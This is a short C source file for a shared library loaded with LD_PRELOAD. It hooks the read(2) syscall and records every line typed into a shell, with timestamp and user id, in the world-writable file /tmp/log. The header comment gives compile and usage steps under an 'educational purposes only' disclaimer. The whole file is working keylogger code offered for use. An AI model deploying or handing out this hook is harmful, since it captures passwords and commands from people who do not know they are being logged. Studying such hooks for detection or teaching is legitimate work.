/*
 * dirty shared hijacking read(2) :-)
 *
 * COMPILE
 * gcc -Wall -ldl -lc -fPIC -shared -o myread2.so myread2.c
 *
 * SUMMARY
 * the main idea is logging all what you type, 
 * capturing syscall read(2) with ld.so(8)
 *
 * USE
 * $ LD_PRELOAD=./myread.so bash
 *
 * DISCLAIMER
 * for educational purposes only
 *
 * AUTHOR
 * Alejandro Gramajo ( agramajo at gmail dot com )
 * 20050330
 *
 */

#include <dlfcn.h>
#include <stdio.h>
#include <unistd.h>
#include <ctype.h>
#include <strings.h>
#include <sys/time.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>

#define REAL_LIBC	((void *) -1L)
#define FILELOG 	"/tmp/log"
#define MAX		256

static char line[MAX];
static int size = 0;

void mytime (char *datetime)
{
	struct tm *ptr;
	time_t tm;

	tm = time(NULL);
	ptr = localtime(&tm);
	strftime(datetime, 12, "%d-%m %H:%M", ptr);
}

void logger (char *buf, size_t blen)
{
	FILE *log1 = NULL;
	int uid;
	char now[12];

	if (blen == 1) {
		umask(000);
		log1 = fopen(FILELOG,"a");
		setbuffer(log1, NULL, 0);

		if ( *buf >= 0x20 && *buf <= 0x7E )         // printable
			line[size++] = *buf;
		else if ( *buf == 0x7F || *buf == 0x08 )    // BS DEL
			line[size++] = '!';
		else if ( *buf == 0x0A ||  *buf == 0x0D ) { // \r \n
			uid = getuid();		
			mytime(now);
			fprintf(log1, "[%s %d] %s\n", now, uid, line);
			size = 0;
			bzero(line, MAX);
		}

		fflush(log1);
		fclose(log1);
	}
}

ssize_t read(int fd, void *buf, size_t count) 
{
	ssize_t (*o_read) (int, void *, size_t);
	int r;

	o_read = dlsym(REAL_LIBC, "read");
	
	r = o_read(fd, buf, count);

	if (r > 0) 
		// 0 == stdin
		// 4 == tty
		if (fd == 4 || fd == 3 || fd == 0) 
			logger(buf, count);

	return r;
}